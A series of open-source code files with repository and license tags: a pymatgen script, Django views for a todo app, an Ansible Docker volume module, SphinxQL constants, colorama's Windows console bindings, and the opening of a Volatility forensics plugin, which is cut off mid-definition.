print(names.ljust(25) + "%8.4f" % mu_t_s[c] + " (" + "%8.4f" % mu_t_s_std[c] + ") " \
+ "%8.4f" % mu_t_a[c] + " (" + "%8.4f" % mu_t_a_std[c] + ") " \
+ "%8.4f" % mu_t_eff[c] + " (" + "%8.4f" % mu_t_eff_std[c] + ") ")
c += 1
# Collect/format remaining returnables and exit function
pscore_tests = [study_test, auxiliary_test] # Collect p-score test results
tilts = np.concatenate((pi_eff, pi_s, pi_a), axis=1) # Collect three sample tilts
return [gamma_ast, vcov_gamma_ast, pscore_tests, tilts, exitflag] | mit |
tchen0965/structural_descriptors_repo | run_connectivity.py | 1 | 1345 | from pymatgen.core.structure import Structure
from pymatgen.analysis.structure_analyzer import VoronoiCoordFinder
import connectivity_from_structure as connectivity
__author__ = 'Tina_Chen'
__contributor__ = 'Anubhav Jain'
if __name__ == '__main__':
# path to structure file
path = 'LiCoO2.cif'
# optional list of strings with central/target species abbreviations
# (i.e. we aim to find connectivity between polyhedra with these species at the center)
central_species = ['Li']
# optional list of strings with peripheral species abbreviations
# (i.e. we aim to find connectivity where these species are surrounding the central/target species)
peripheral_species = None
# radius from the central/target sites to which we look for peripheral species
# only needs to be changed if central species is very large (eg: Ba, Sr)
radius = 2.6
structure = Structure.from_file(path, True, True)
print structure
connectivity_matrix, all_polyhedra, supercell = \
connectivity.get_connectivity_matrix(structure, True, radius, peripheral_species, central_species)
descriptions = connectivity.get_connectivity_description(connectivity_matrix, all_polyhedra, structure, True, anions=peripheral_species)
for cation in descriptions:
print ""
print descriptions[cation]
| mit |
BRupholdt/KissTodo | todo/views.py | 1 | 16586 | # KissTodo - a simple, Django based todo management tool.
# Copyright (C) 2011 Massimo Barbieri - http://www.massimobarbieri.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from django.template.loader import get_template
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from django.conf import settings
from django import forms
from random import choice
from datetime import datetime
import os
if settings.KISSTODO_USE_GAE:
from google.appengine.api import users
from google.appengine.api import mail
from models import *
def my_login_required(function):
def decorated_view(*args, **kwargs):
if settings.KISSTODO_USE_GAE:
f = function # GAE authentication, nothing to do (see app.yaml)
else:
f = login_required(function) # Django authentication
return f(*args, **kwargs)
return decorated_view
def test_page(request):
if 'op' in request.POST and request.POST['op']=='simulate error':
raise Exception("Simulated Error!")
return render_to_response('todo/test_page.html',
#RequestContext(request, {'media_root':settings.MEDIA_ROOT, 'lists':List.objects, 'todos':Todo.objects,}))
RequestContext(request, {'media_root':settings.MEDIA_ROOT}))
@my_login_required
def board(request, mobile=False, selected_list_id=''):
inbox = List.objects.get_or_create_inbox(_get_current_user(request))
if settings.KISSTODO_USE_GAE:
logout_url=users.create_logout_url(settings.KISSTODO_SITE_URL)
else:
logout_url=reverse('logout')
#login_url=users.create_login_url("/")
#request.session['mobile']=mobile
return render_to_response('todo/board.html', RequestContext(request, {'inbox_list_id':inbox.id, 'logout_url':logout_url, 'mobile':mobile, 'selected_list_id':selected_list_id}))
def _do_send_mail(t, request):
address_from = "todo_reminder@"+str(os.environ['APPLICATION_ID'])+".appspotmail.com"
address_to = t.list.owner
if not '@' in address_to: address_to += "@gmail.com"
subject="KissTodo notification"
template = get_template('todo/todo_notification_email.txt')
ctx=RequestContext(request, {'todo':t})
mail.send_mail(sender=address_from,to=address_to,subject=subject,body=template.render(ctx))
def todo_send_mail(request):
todos = Todo.objects.filter(notify_todo=True, complete=False, due_date__isnull=False).order_by('due_date')
res = "\nres:\n"
now = datetime.now()
for t in todos:
if t.due_date - timedelta(minutes=t.notify_minutes) + timedelta(minutes=t.time_offset)< now:
res += "\nTODO:"+t.description+"\n"
_do_send_mail(t, request)
t.notify_todo=False
t.save()
return HttpResponse(str(now)+res, mimetype="text/plain")
@my_login_required
def todo_empty_trash(request):
for t in Todo.objects.deleted(_get_current_user(request)): t.delete_raw()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_clear_completed_items(request, list_id):
l=List.objects.get(id=int(list_id))
_check_permission(request, l)
todos=Todo.objects.filter(list__id=list_id)
for t in todos:
if t.complete: t.delete_raw()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_search(request, search_string, sort_mode, show_complete='F'):
todos = Todo.objects.search(_get_current_user(request), search_string)
if (show_complete=='F'):
todos = [t for t in todos if not t.complete]
return render_to_response('todo/todo_list.html', RequestContext(request, {'todos':Todo.todo_sort(todos, sort_mode), 'show_list': True }))
@my_login_required
def todo_list(request, list_id, sort_mode, show_complete='F', mobile=False):
#import time
#time.sleep(1)
if int(list_id)>0:
l=List.objects.get(id=int(list_id))
_check_permission(request, l)
show_list = False
show_empty_trash = False
show_clear_completed_items = False
if int(list_id)==-2:
todos = Todo.objects.hot(_get_current_user(request))
show_list = True
elif int(list_id)==-3:
todos = Todo.objects.deleted(_get_current_user(request))
show_list = True
if len(todos)>0: show_empty_trash = True
elif int(list_id)==-4:
todos = Todo.objects.all_by_user(_get_current_user(request))
show_list = True
else:
todos = Todo.objects.filter(list__id=list_id)
#if (show_complete=='F'):
# todos = [t for t in todos if not t.complete]
if int(list_id)>0: show_clear_completed_items=any([t.complete for t in todos])
return render_to_response('todo/todo_list.html', RequestContext(request, {'list_id':list_id,'todos':Todo.todo_sort(todos, sort_mode), 'show_list':show_list, 'show_empty_trash':show_empty_trash, 'show_clear_completed_items':show_clear_completed_items, 'mobile':mobile}))
@my_login_required
def list_list(request, selected_list_id, mobile=False):
inbox = List.objects.get_or_create_inbox(_get_current_user(request))
return render_to_response('todo/list_list.html', RequestContext(request, {'lists':List.objects.filter(owner=_get_current_user(request)), 'inbox_list': inbox, 'selected_list_id': str(selected_list_id), 'mobile':mobile}))
@my_login_required
def list_add(request):
l=List()
l.name=request.POST['name']
l.owner=_get_current_user(request)
if not l.is_special():
l.save()
out = l.id
else:
out=-1
return HttpResponse(out, mimetype="text/plain")
@my_login_required
def list_delete(request):
l=List.objects.get(id=int(request.POST['list_id']))
_check_permission(request, l)
l.delete()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_delete(request):
t=Todo.objects_raw.get(id=int(request.POST['todo_id']))
_check_permission(request, t.list)
t.delete()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_undelete(request):
t=Todo.objects_raw.get(id=int(request.POST['todo_id']))
_check_permission(request, t.list)
t.undelete()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_complete(request):
t=Todo.objects_raw.get(id=int(request.POST['todo_id']))
_check_permission(request, t.list)
t.toggle_complete()
t.save()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_postpone(request):
t=Todo.objects_raw.get(id=int(request.POST['todo_id']))
_check_permission(request, t.list)
t.postpone()
t.save()
return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_edit(request, todo_id, mobile=False):
t=Todo.objects_raw.get(id=int(todo_id))
_check_permission(request, t.list)
if request.method == 'POST':
if 'priority' in request.POST: t.priority=int(request.POST['priority'])
if 'description' in request.POST: t.description=request.POST['description']
if 'list_id' in request.POST: t.list=List.objects.get(id=int(request.POST['list_id']))
if 'due_date' in request.POST:
t.due_date=None
if request.POST['due_date']:
try:
t.due_date=datetime.strptime(request.POST['due_date'],'%Y/%m/%d %H:%M') # 2012/12/21 15:42
except:
try:
t.due_date=datetime.strptime(request.POST['due_date'],'%Y/%m/%d') # 2012/12/21
except:
try:
t.due_date=datetime.strptime(request.POST['due_date'],'%Y-%m-%dT%H:%M') # 2012-12-21T15:42 - for html5 input type
except:
try:
t.due_date=datetime.strptime(request.POST['due_date'],'%Y-%m-%d') # 2012-12-21 - for html5 input type
except:
pass # wrong format
if 'repeat_type' in request.POST: t.repeat_type=request.POST['repeat_type']
if 'repeat_every' in request.POST and request.POST['repeat_every']: t.repeat_every=int(request.POST['repeat_every'])
if 'notify_minutes' in request.POST and request.POST['notify_minutes']: t.notify_minutes=int(request.POST['notify_minutes'])
if 'time_offset' in request.POST and request.POST['time_offset']: t.time_offset=int(request.POST['time_offset'])
t.update_notify_todo()
t.save()
#return render_to_response('todo/todo_item.html', RequestContext(request, {'todo':t,}))
return HttpResponseRedirect('/todo/ajax/todo/show_item/'+str(t.id));
else:
return render_to_response('todo/todo_edit.html', RequestContext(request, {'todo':t,'repeat_type_choiches':Todo.repeat_type_choiches,'lists':List.objects.filter(owner=_get_current_user(request)), 'mobile':mobile}))
@my_login_required
def list_edit(request, list_id):
    """Rename a todo list (POST) or render its edit form (GET)."""
    todo_list = List.objects.get(id=int(list_id))
    _check_permission(request, todo_list)
    if request.method != 'POST':
        return render_to_response('todo/list_edit.html', RequestContext(request, {'list': todo_list}))
    if 'name' in request.POST:
        todo_list.name = request.POST['name']
    todo_list.save()
    return HttpResponse("", mimetype="text/plain")
@my_login_required
def todo_show_item(request, todo_id, mobile=False):
    """Render a single todo item fragment after a permission check."""
    item = Todo.objects_raw.get(id=int(todo_id))
    _check_permission(request, item.list)
    context = RequestContext(request, {'todo': item, 'mobile': mobile})
    return render_to_response('todo/todo_item.html', context)
@my_login_required
def todo_add(request):
    """Create a new Todo in the given list; returns the new id as plain text.

    A "!1"/"!2"/"!3" prefix on the description sets the priority and is
    stripped; each priority level is checked in turn against the (possibly
    already shortened) description.
    """
    target_list = List.objects.get(id=request.POST['list_id'])
    _check_permission(request, target_list)
    todo = Todo()
    todo.description = request.POST['description']
    for level in (1, 2, 3):
        if todo.description[0:2] == "!" + str(level):
            todo.priority = level
            todo.description = todo.description[2:]
    todo.list = target_list
    todo.save()
    return HttpResponse(todo.id, mimetype="text/plain")
@my_login_required
def import_rtm(request):
    """Import todos from a Remember The Milk Atom feed.

    POST with an empty URL deletes this user's previously imported
    ("ATOM"-sourced) todos; POST with a URL fetches and parses the feed,
    creating one Todo per entry. GET renders the import form.
    Returns a plain-text debug dump of what was imported.
    """
    if request.method == 'POST':
        form = ImportRtmForm(request.POST)
        if not form.is_valid(): return HttpResponse("FORM ERROR", mimetype="text/plain")
        url = form.cleaned_data['url']
        if url == "":
            # Empty URL means "cleanup": remove this user's ATOM imports.
            for t in Todo.objects_raw.filter(external_source="ATOM"):
                if t.list.owner==_get_current_user(request): t.delete_raw()
            return HttpResponse("Empty atom feed received. Cleanup complete.", mimetype="text/plain")
        import urllib2
        text = urllib2.urlopen(url).read()
        #return HttpResponse(text, mimetype="text/plain")
        from xml.dom import minidom
        from datetime import datetime
        #xmldoc = minidom.parseString(text.encode( "utf-8" ))
        xmldoc = minidom.parseString(text)
        entries=xmldoc.getElementsByTagName("entry")
        out=""
        for e in entries:
            t = Todo()
            t.description = e.getElementsByTagName("title")[0].firstChild.nodeValue
            t.deleted = False
            t.completed = False
            t.external_source = "ATOM"
            t.external_id = e.getElementsByTagName("id")[0].firstChild.nodeValue
            out += 'external_id: "'+e.getElementsByTagName("id")[0].firstChild.nodeValue+'"\n'
            out += "title: "+e.getElementsByTagName("title")[0].firstChild.nodeValue+"\n"
            # RTM renders entry metadata as alternating <span> pairs:
            # even index = field name (with trailing ':'), odd index = value.
            count=0
            field_name = ""
            for c in e.getElementsByTagName("content")[0].getElementsByTagName("span"):
                #out += ('"'+(c.firstChild.nodeValue or u"*")+'" ')
                if count % 2 == 0:
                    # Field-name span: strip the trailing ':' character.
                    field_name = str(c.firstChild.nodeValue).strip()[0:-1]
                else:
                    out += '"%s"=>"%s"' % (field_name, c.firstChild.nodeValue)
                    if field_name == "Due":
                        t.due_date = _parse_date(c.firstChild.nodeValue)
                    elif field_name == "Priority":
                        t.priority = str(_parse_priority(c.firstChild.nodeValue))
                    elif field_name == "List":
                        t.list = _parse_list(c.firstChild.nodeValue, _get_current_user(request))
                    elif field_name == "URL":
                        # The URL value is wrapped in an extra element.
                        t.description += " (%s)" % (c.firstChild.firstChild.nodeValue,)
                    elif field_name == "Repeat every":
                        t.repeat_every = int(c.firstChild.nodeValue)
                    elif field_name == "Repeat type":
                        t.repeat_type = _parse_repeat_type(c.firstChild.nodeValue)
                    out += u"\n"
                count+=1
            out += t.__unicode__() +"\n"
            out += "\n"
            t.save()
        return HttpResponse(out, mimetype="text/plain")
    else:
        return render_to_response("todo/import_rtm_form.html",RequestContext(request, {'form': ImportRtmForm()}))
@my_login_required
def export_atom(request):
    """Export the current user's incomplete todos as an Atom feed."""
    # NOTE(review): this filters on 'complete' while import_rtm sets
    # 'completed' -- verify which is the actual Todo model field name.
    todos = []  # renamed from 'list', which shadowed the builtin
    for t in Todo.objects.filter(complete=False):
        if t.list.owner == _get_current_user(request):
            todos.append(t)
    return render_to_response("todo/export_atom.atom", RequestContext(request, {'todos': todos}))  # , mimetype="application/atom+xml"
def cache_manifest(request):
    """Serve the HTML5 application-cache manifest for the requesting host."""
    template = get_template('todo/cache.manifest')
    rendered = template.render(RequestContext(request, {'host': request.META.get('HTTP_HOST')}))
    return HttpResponse(rendered, mimetype="text/cache-manifest")
def redirect_login(request):
    # Landing page that forwards the browser to the login flow.
    return render_to_response("todo/redirect_login.html",RequestContext(request, {}))
def do_logout(request):
    # Terminate the session, then send the user back to the site root.
    logout(request)
    return HttpResponseRedirect(settings.KISSTODO_SITE_URL)
def _parse_date(date):
# 'never' or 'Mon 13 Jun 11 18:30' or 'Mon 13 Jun 11'
if date=='never': return None
try:
dt = datetime.strptime(date, '%a %d %b %y %H:%M')
except:
dt = datetime.strptime(date, '%a %d %b %y')
return dt
def _parse_priority(priority):
# 'none', '1', '2', '3'
if priority=='none': return 4
return int(priority)
def _parse_repeat_type(r):
# 'none', 'd', 'w', 'm', 'y'
if r=='none': return ''
return r
def _parse_list(list, user):
    """Resolve an RTM list name to a List owned by *user*, creating it if needed.

    'Inbox' maps to the user's dedicated inbox list.
    """
    if list == 'Inbox':
        return List.objects.get_or_create_inbox(user)
    # get_or_create returns (object, created); only the object is needed.
    # Removed an unreachable 'return int(priority)' that referenced an
    # undefined name (copy/paste leftover from _parse_priority).
    result, created = List.objects.get_or_create(name=list, owner=user)
    return result
def _check_permission(request, list):
    # Guard: only the owner of the list may act on it.
    if list.owner!=_get_current_user(request): raise Exception("Permission denied")
def _get_current_user(request):
    """Return the current username: GAE nickname or Django auth username."""
    if settings.KISSTODO_USE_GAE:
        user = users.get_current_user()
        if user: return user.nickname()
        # NOTE(review): implicitly returns None when no GAE user is signed
        # in -- confirm callers tolerate a None owner comparison.
    else:
        return request.user.username
class ImportRtmForm(forms.Form):
    """Form holding the Remember The Milk Atom feed URL to import."""
    #text = forms.CharField(widget=forms.Textarea(), label='Atom feed', required=False)
    url = forms.CharField(label='url', required=False)
| gpl-3.0 |
kbrebanov/ansible | lib/ansible/modules/cloud/docker/docker_volume.py | 45 | 7796 | #!/usr/bin/python
# coding: utf-8
#
# Copyright 2017 Red Hat | Ansible, Alex Grönholm <alex.gronholm@nextday.fi>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Ansible module metadata: schema version, maturity and support channel.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = u'''
module: docker_volume
version_added: "2.4"
short_description: Manage Docker volumes
description:
- Create/remove Docker volumes.
- Performs largely the same function as the "docker volume" CLI subcommand.
options:
name:
description:
- Name of the volume to operate on.
required: true
aliases:
- volume_name
driver:
description:
- Specify the type of volume. Docker provides the C(local) driver, but 3rd party drivers can also be used.
default: local
driver_options:
description:
- "Dictionary of volume settings. Consult docker docs for valid options and values:
U(https://docs.docker.com/engine/reference/commandline/volume_create/#driver-specific-options)"
labels:
description:
- List of labels to set for the volume
force:
description:
- With state C(present) causes the volume to be deleted and recreated if the volume already
exist and the driver, driver options or labels differ. This will cause any data in the existing
volume to be lost.
type: bool
default: 'no'
state:
description:
- C(absent) deletes the volume.
- C(present) creates the volume, if it does not already exist.
default: present
choices:
- absent
- present
extends_documentation_fragment:
- docker
author:
- Alex Grönholm (@agronholm)
requirements:
- "python >= 2.6"
- "docker-py >= 1.10.0"
- "The docker server >= 1.9.0"
'''
EXAMPLES = '''
- name: Create a volume
docker_volume:
name: volume_one
- name: Remove a volume
docker_volume:
name: volume_one
state: absent
- name: Create a volume with options
docker_volume:
name: volume_two
driver_options:
type: btrfs
device: /dev/sda2
'''
RETURN = '''
facts:
description: Volume inspection results for the affected volume.
returned: success
type: dict
sample: {}
'''
try:
from docker.errors import APIError
except ImportError:
# missing docker-py handled in ansible.module_utils.docker
pass
from ansible.module_utils.docker_common import DockerBaseClass, AnsibleDockerClient
from ansible.module_utils.six import iteritems, text_type
class TaskParameters(DockerBaseClass):
    """Typed holder for the module's task parameters.

    Declares the expected attributes with None defaults, then overwrites
    each one with the value supplied in the Ansible module parameters.
    """
    def __init__(self, client):
        super(TaskParameters, self).__init__()
        self.client = client
        # Declared defaults; each is replaced below when present in params.
        self.volume_name = None
        self.driver = None
        self.driver_options = None
        self.labels = None
        self.force = None
        self.debug = None
        for key, value in iteritems(client.module.params):
            setattr(self, key, value)
class DockerVolumeManager(object):
    """Drives the create/remove logic for a single Docker volume.

    Constructing the manager executes the requested state transition
    immediately and records the outcome in ``self.results``.
    """
    def __init__(self, client):
        self.client = client
        self.parameters = TaskParameters(client)
        self.check_mode = self.client.check_mode
        self.results = {
            u'changed': False,
            u'actions': []
        }
        self.diff = self.client.module._diff
        self.existing_volume = self.get_existing_volume()
        # Dispatch on the requested state right away.
        state = self.parameters.state
        if state == 'present':
            self.present()
        elif state == 'absent':
            self.absent()
    def get_existing_volume(self):
        """Return the docker volume dict matching volume_name, or None."""
        try:
            volumes = self.client.volumes()
        except APIError as e:
            self.client.fail(text_type(e))
        if volumes[u'Volumes'] is None:
            return None
        for volume in volumes[u'Volumes']:
            if volume['Name'] == self.parameters.volume_name:
                return volume
        return None
    def has_different_config(self):
        """
        Return the list of differences between the current parameters and the existing volume.
        :return: list of options that differ
        """
        differences = []
        if self.parameters.driver and self.parameters.driver != self.existing_volume['Driver']:
            differences.append('driver')
        if self.parameters.driver_options:
            if not self.existing_volume.get('Options'):
                differences.append('driver_options')
            else:
                for key, value in iteritems(self.parameters.driver_options):
                    if (not self.existing_volume['Options'].get(key) or
                            value != self.existing_volume['Options'][key]):
                        differences.append('driver_options.%s' % key)
        if self.parameters.labels:
            # Compare the union of requested and existing label keys so that
            # both added and changed labels are reported.
            existing_labels = self.existing_volume.get('Labels', {})
            all_labels = set(self.parameters.labels) | set(existing_labels)
            for label in all_labels:
                if existing_labels.get(label) != self.parameters.labels.get(label):
                    differences.append('labels.%s' % label)
        return differences
    def create_volume(self):
        """Create the volume if it does not exist (no-op in check mode)."""
        if not self.existing_volume:
            if not self.check_mode:
                try:
                    resp = self.client.create_volume(self.parameters.volume_name,
                                                     driver=self.parameters.driver,
                                                     driver_opts=self.parameters.driver_options,
                                                     labels=self.parameters.labels)
                    self.existing_volume = self.client.inspect_volume(resp['Name'])
                except APIError as e:
                    self.client.fail(text_type(e))
            self.results['actions'].append("Created volume %s with driver %s" % (self.parameters.volume_name, self.parameters.driver))
            self.results['changed'] = True
    def remove_volume(self):
        """Remove the volume if it exists (no-op in check mode)."""
        if self.existing_volume:
            if not self.check_mode:
                try:
                    self.client.remove_volume(self.parameters.volume_name)
                except APIError as e:
                    self.client.fail(text_type(e))
            self.results['actions'].append("Removed volume %s" % self.parameters.volume_name)
            self.results['changed'] = True
    def present(self):
        """Ensure the volume exists; with force=True, recreate on config drift."""
        differences = []
        if self.existing_volume:
            differences = self.has_different_config()
        if differences and self.parameters.force:
            # Destructive: recreating the volume loses its data.
            self.remove_volume()
            self.existing_volume = None
        self.create_volume()
        if self.diff or self.check_mode or self.parameters.debug:
            self.results['diff'] = differences
        if not self.check_mode and not self.parameters.debug:
            self.results.pop('actions')
        self.results['ansible_facts'] = {u'docker_volume': self.get_existing_volume()}
    def absent(self):
        """Ensure the volume does not exist."""
        self.remove_volume()
def main():
    """Module entry point: build the docker client, run the manager, report."""
    argument_spec = {
        'volume_name': {'type': 'str', 'required': True, 'aliases': ['name']},
        'state': {'type': 'str', 'default': 'present', 'choices': ['present', 'absent']},
        'driver': {'type': 'str', 'default': 'local'},
        'driver_options': {'type': 'dict', 'default': {}},
        'labels': {'type': 'list'},
        'force': {'type': 'bool', 'default': False},
        'debug': {'type': 'bool', 'default': False},
    }
    client = AnsibleDockerClient(argument_spec=argument_spec,
                                 supports_check_mode=True)
    manager = DockerVolumeManager(client)
    client.module.exit_json(**manager.results)
if __name__ == '__main__':
    main()
| gpl-3.0 |
abhijo89/sphinxit | sphinxit/core/constants.py | 4 | 1436 | """
sphinxit.core.constants
~~~~~~~~~~~~~~~~~~~~~~~
Defines some Sphinx-specific constants.
:copyright: (c) 2013 by Roman Semirook.
:license: BSD, see LICENSE for more details.
"""
from collections import namedtuple
# SphinxQL reserved words; identifiers colliding with these must be escaped.
RESERVED_KEYWORDS = (
    'AND',
    'AS',
    'ASC',
    'AVG',
    'BEGIN',
    'BETWEEN',
    'BY',
    'CALL',
    'COLLATION',
    'COMMIT',
    'COUNT',
    'DELETE',
    'DESC',
    'DESCRIBE',
    'DISTINCT',
    'FALSE',
    'FROM',
    'GLOBAL',
    'GROUP',
    'IN',
    'INSERT',
    'INTO',
    'LIMIT',
    'MATCH',
    'MAX',
    'META',
    'MIN',
    'NOT',
    'NULL',
    'OPTION',
    'OR',
    'ORDER',
    'REPLACE',
    'ROLLBACK',
    'SELECT',
    'SET',
    'SHOW',
    'START',
    'STATUS',
    'SUM',
    'TABLES',
    'TRANSACTION',
    'TRUE',
    'UPDATE',
    'VALUES',
    'VARIABLES',
    'WARNINGS',
    'WEIGHT',
    'WHERE',
    'WITHIN'
)
# Characters that must be escaped in query strings, grouped by how many
# backslashes the Sphinx query syntax requires.
ESCAPED_CHARS = namedtuple('EscapedChars', ['single_escape', 'double_escape'])(
    single_escape=("'", '+', '[', ']', '=', '*'),
    double_escape=('@', '!', '^', '(', ')', '~', '-', '|', '/', '<<', '$', '"')
)
# Canonical ordering of SQL clause nodes when rendering SELECT and UPDATE.
NODES_ORDER = namedtuple('NodesOrder', ['select', 'update'])(
    select=(
        'SelectFrom',
        'Where',
        'GroupBy',
        'OrderBy',
        'WithinGroupOrderBy',
        'Limit',
        'Options'
    ),
    update=(
        'UpdateSet',
        'Where',
        'Options'
    )
)
| bsd-3-clause |
chaoallsome/pip | pip/_vendor/colorama/win32.py | 446 | 5121 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
# from winbase.h
# Standard handle identifiers understood by GetStdHandle.
STDOUT = -11
STDERR = -12
try:
    import ctypes
    from ctypes import LibraryLoader
    windll = LibraryLoader(ctypes.WinDLL)
    from ctypes import wintypes
except (AttributeError, ImportError):
    # Non-Windows platform (or ctypes without WinDLL): expose no-op stand-ins.
    windll = None
    SetConsoleTextAttribute = lambda *_: None
else:
    from ctypes import byref, Structure, c_char, POINTER
    COORD = wintypes._COORD
    class CONSOLE_SCREEN_BUFFER_INFO(Structure):
        """struct in wincon.h."""
        _fields_ = [
            ("dwSize", COORD),
            ("dwCursorPosition", COORD),
            ("wAttributes", wintypes.WORD),
            ("srWindow", wintypes.SMALL_RECT),
            ("dwMaximumWindowSize", COORD),
        ]
        def __str__(self):
            # Debug-friendly flat dump of every field.
            return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (
                self.dwSize.Y, self.dwSize.X
                , self.dwCursorPosition.Y, self.dwCursorPosition.X
                , self.wAttributes
                , self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right
                , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
            )
    # ctypes prototypes for the kernel32 console API used below.
    _GetStdHandle = windll.kernel32.GetStdHandle
    _GetStdHandle.argtypes = [
        wintypes.DWORD,
    ]
    _GetStdHandle.restype = wintypes.HANDLE
    _GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
    _GetConsoleScreenBufferInfo.argtypes = [
        wintypes.HANDLE,
        POINTER(CONSOLE_SCREEN_BUFFER_INFO),
    ]
    _GetConsoleScreenBufferInfo.restype = wintypes.BOOL
    _SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
    _SetConsoleTextAttribute.argtypes = [
        wintypes.HANDLE,
        wintypes.WORD,
    ]
    _SetConsoleTextAttribute.restype = wintypes.BOOL
    _SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
    _SetConsoleCursorPosition.argtypes = [
        wintypes.HANDLE,
        COORD,
    ]
    _SetConsoleCursorPosition.restype = wintypes.BOOL
    _FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
    _FillConsoleOutputCharacterA.argtypes = [
        wintypes.HANDLE,
        c_char,
        wintypes.DWORD,
        COORD,
        POINTER(wintypes.DWORD),
    ]
    _FillConsoleOutputCharacterA.restype = wintypes.BOOL
    _FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
    _FillConsoleOutputAttribute.argtypes = [
        wintypes.HANDLE,
        wintypes.WORD,
        wintypes.DWORD,
        COORD,
        POINTER(wintypes.DWORD),
    ]
    _FillConsoleOutputAttribute.restype = wintypes.BOOL
    # NOTE(review): bound to the ANSI SetConsoleTitleA despite the W-suffixed
    # local name -- confirm the A/W choice is intentional.
    _SetConsoleTitleW = windll.kernel32.SetConsoleTitleA
    _SetConsoleTitleW.argtypes = [
        wintypes.LPCSTR
    ]
    _SetConsoleTitleW.restype = wintypes.BOOL
    # Resolved once at import time; maps stream id -> Windows console handle.
    handles = {
        STDOUT: _GetStdHandle(STDOUT),
        STDERR: _GetStdHandle(STDERR),
    }
    def GetConsoleScreenBufferInfo(stream_id=STDOUT):
        # Query size/cursor/attribute/viewport info for the console handle.
        handle = handles[stream_id]
        csbi = CONSOLE_SCREEN_BUFFER_INFO()
        success = _GetConsoleScreenBufferInfo(
            handle, byref(csbi))
        # NOTE(review): `success` is ignored; csbi stays zeroed on failure.
        return csbi
    def SetConsoleTextAttribute(stream_id, attrs):
        # Apply a WORD of color/intensity attributes to the console.
        handle = handles[stream_id]
        return _SetConsoleTextAttribute(handle, attrs)
    def SetConsoleCursorPosition(stream_id, position, adjust=True):
        # `position` is an ANSI-style 1-based (row, column) pair.
        position = COORD(*position)
        # If the position is out of range, do nothing.
        if position.Y <= 0 or position.X <= 0:
            return
        # Adjust for Windows' SetConsoleCursorPosition:
        # 1. being 0-based, while ANSI is 1-based.
        # 2. expecting (x,y), while ANSI uses (y,x).
        adjusted_position = COORD(position.Y - 1, position.X - 1)
        if adjust:
            # Adjust for viewport's scroll position
            sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
            adjusted_position.Y += sr.Top
            adjusted_position.X += sr.Left
        # Resume normal processing
        handle = handles[stream_id]
        return _SetConsoleCursorPosition(handle, adjusted_position)
    def FillConsoleOutputCharacter(stream_id, char, length, start):
        # Write `length` copies of the single character `char` starting at
        # COORD `start`; returns how many cells were actually written.
        handle = handles[stream_id]
        char = c_char(char.encode())
        length = wintypes.DWORD(length)
        num_written = wintypes.DWORD(0)
        # Note that this is hard-coded for ANSI (vs wide) bytes.
        success = _FillConsoleOutputCharacterA(
            handle, char, length, start, byref(num_written))
        return num_written.value
    def FillConsoleOutputAttribute(stream_id, attr, length, start):
        ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
        # Paint `length` cells with attribute `attr` starting at COORD `start`.
        handle = handles[stream_id]
        attribute = wintypes.WORD(attr)
        length = wintypes.DWORD(length)
        num_written = wintypes.DWORD(0)
        # Note that this is hard-coded for ANSI (vs wide) bytes.
        return _FillConsoleOutputAttribute(
            handle, attribute, length, start, byref(num_written))
    def SetConsoleTitle(title):
        # NOTE(review): delegates to the ANSI SetConsoleTitleA binding (the
        # local name is W-suffixed) -- confirm intentional.
        return _SetConsoleTitleW(title)
| mit |
loveshell/volatility | volatility/plugins/linux/vma_cache.py | 58 | 2724 | # Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
from volatility.plugins.linux.slab_info import linux_slabinfo
class linux_vma_cache(linux_common.AbstractLinuxCommand):
    """Gather VMAs from the vm_area_struct cache"""
    def __init__(self, config, *args, **kwargs):
        linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
        # -u/--unallocated: also walk freed slab objects, which can
        # recover VMAs from exited processes.
        self._config.add_option('UNALLOCATED', short_option = 'u',
                        default = False,
                        help = 'Show unallocated',
                        action = 'store_true')
    def calculate(self):
